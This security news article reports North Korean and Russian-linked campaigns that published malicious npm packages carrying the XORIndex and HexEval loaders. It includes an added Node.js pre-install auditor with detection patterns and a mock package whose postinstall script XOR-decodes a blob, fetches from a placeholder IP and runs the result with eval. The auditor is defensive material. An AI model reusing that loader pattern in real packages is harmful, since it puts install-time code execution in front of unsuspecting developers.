North Korean Hackers Flood npm Registry with XORIndex Malware in Ongoing Attack Campaign


Jul 15, 2025 | Ravie Lakshmanan | Malware / Web Security

The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing another set of 67 malicious packages to the npm registry, underscoring ongoing attempts to poison the open-source ecosystem via software supply chain attacks.

The packages, per Socket, have attracted more than 17,000 downloads and incorporate a previously undocumented version of a malware loader codenamed XORIndex. The activity is an expansion of an attack wave spotted last month that involved the distribution of 35 npm packages that deployed another loader known as HexEval.

“The Contagious Interview operation continues to follow a whack-a-mole dynamic, where defenders detect and report malicious packages, and North Korean threat actors quickly respond by uploading new variants using the same, similar, or slightly evolved playbooks,” Socket researcher Kirill Boychenko said.

Contagious Interview is the name assigned to a long-running campaign that seeks to entice developers into downloading and executing an open-source project as part of a purported coding assignment. First publicly disclosed in late 2023, the threat cluster is also tracked as DeceptiveDevelopment, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi.

The activity is believed to be complementary to Pyongyang’s notorious remote information technology (IT) worker scheme, adopting the strategy of targeting developers already employed at companies of interest rather than applying for a job.

The attack chains using malicious npm packages are fairly straightforward in that they serve as a conduit for a known JavaScript loader and stealer referred to as BeaverTail, which is subsequently used to extract data from web browsers and cryptocurrency wallets, as well as to deploy a Python backdoor known as InvisibleFerret.

“The two campaigns now operate in parallel. XORIndex has amassed over 9,000 downloads in a short window (June to July 2025), while HexEval continues at a steady pace, with more than 8,000 additional downloads across the newly discovered packages,” Boychenko said.

The XORIndex Loader, like HexEval, profiles the compromised machine and uses endpoints associated with hard-coded command-and-control (C2) infrastructure to obtain the external IP address of the host. The collected information is then beaconed to a remote server, after which BeaverTail is launched.
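The behaviour described in the two paragraphs above (a package that exists only to run a loader, which profiles the host, contacts a hard-coded endpoint for the external IP and then hands off to a second stage) is something a defender can screen for before `npm install` ever runs a lifecycle script. The following is an added example, not code from the article, from Socket, or from any of the packages discussed: a small offline Node.js heuristic that audits a package's `package.json` hooks and source files for those traits. The package names, file contents, the block/allow thresholds and the `192.0.2.10` address (an RFC 5737 documentation address) are constructed placeholders, not indicators from the campaign.

```javascript
// Added example: a heuristic pre-install audit for npm packages. Not code from
// the article or from Socket. Runs offline on constructed sample data; the
// package names, script bodies and the 192.0.2.10 address are placeholders.

// npm executes these scripts automatically during `npm install`, which is why
// they are the natural place for a loader to start.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Source traits that correspond to the loader behaviour the article describes:
// decoding an obfuscated blob, spawning processes, contacting a hard-coded
// address, looking up the host's external IP, and executing fetched code.
const SOURCE_PATTERNS = [
  { name: 'dynamic-eval',       re: /\beval\s*\(|new\s+Function\s*\(/ },
  { name: 'child-process',      re: /require\s*\(\s*['"]child_process['"]\s*\)/ },
  { name: 'hard-coded-ipv4',    re: /\b(?:\d{1,3}\.){3}\d{1,3}\b/ },
  { name: 'xor-decode-loop',    re: /charCodeAt\s*\([^)]*\)\s*\^/ },
  { name: 'external-ip-lookup', re: /\/(?:ip|myip|whoami)\b/i },
];

// One finding per install-time hook and per (file, pattern) hit.
function auditPackage(pkgJson, files) {
  const findings = [];
  const scripts = pkgJson.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) {
      findings.push({ where: `scripts.${hook}`, reason: 'install-time-hook', detail: scripts[hook] });
    }
  }
  for (const [path, source] of Object.entries(files)) {
    for (const { name, re } of SOURCE_PATTERNS) {
      const hit = source.match(re);
      if (hit) findings.push({ where: path, reason: name, detail: hit[0] });
    }
  }
  return findings;
}

// Verdict threshold is an assumption of this example, not a rule from the
// article: an install hook plus any suspicious source trait, or two or more
// distinct traits on their own, is enough to block the install for review.
function shouldBlock(findings) {
  const hasHook = findings.some((f) => f.reason === 'install-time-hook');
  const traits = new Set(findings.filter((f) => f.reason !== 'install-time-hook').map((f) => f.reason));
  return (hasHook && traits.size >= 1) || traits.size >= 2;
}

// Constructed sample packages (not real packages from the registry).
const BENIGN = {
  pkg: { name: 'pad-helper', version: '1.0.0', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = (s, n) => String(s).padStart(n);' },
};

const SUSPECT = {
  pkg: { name: 'example-loader', version: '1.0.0', scripts: { postinstall: 'node lib/setup.js' } },
  files: {
    'lib/setup.js': [
      "const cp = require('child_process');",
      "const key = 7;",
      "const blob = '\\x6a\\x6e\\x69';",
      "let stage = '';",
      "for (let i = 0; i < blob.length; i++) stage += String.fromCharCode(blob.charCodeAt(i) ^ key);",
      "fetch('http://192.0.2.10/ip').then(() => eval(stage));",
    ].join('\n'),
  },
};

function report(sample) {
  const findings = auditPackage(sample.pkg, sample.files);
  return { name: sample.pkg.name, block: shouldBlock(findings), findings };
}

for (const sample of [BENIGN, SUSPECT]) {
  const r = report(sample);
  console.log(`${r.name}: ${r.block ? 'BLOCK' : 'ok'}`);
  for (const f of r.findings) console.log(`  ${f.where}: ${f.reason} (${f.detail})`);
}
```

In practice you would feed `auditPackage` the contents of an `npm pack` tarball before installing it, and pair the check with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) so that lifecycle hooks never run unreviewed in the first place. The patterns are deliberately coarse: they will flag legitimate native-module build scripts and any code that embeds an IP literal, so treat a hit as a prompt for manual review rather than proof of compromise.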

Further analysis of these packages has uncovered a steady evolution of the loader, progressing from a bare-bones prototype to a sophisticated, stealthier malware. Early iterations were found to lack obfuscation and reconnaissance capabilities while keeping their core functionality intact, with second- and third-generation versions introducing rudimentary system reconnaissance capabilities.

“Contagious Interview threat actors will continue to diversify their malware portfolio, rotating through new npm maintainer aliases, reusing loaders such as HexEval Loader and malware families like BeaverTail and InvisibleFerret, and actively deploying newly observed variants including XORIndex Loader,” Boychenko said.

The disclosure comes as security researchers revealed that cybercriminals with ties to Russia published 10 npm packages designed to compromise Windows systems with a PowerShell payload retrieved from a remote server that, in turn, delivers a stealer capable of grabbing data from web browsers and likely launching a cryptocurrency miner.

“More worryingly, they’ve also manipulated npm download metrics to make their packages appear to have millions of downloads, lending false legitimacy to their malicious code,” security researcher Paul McCarty said.
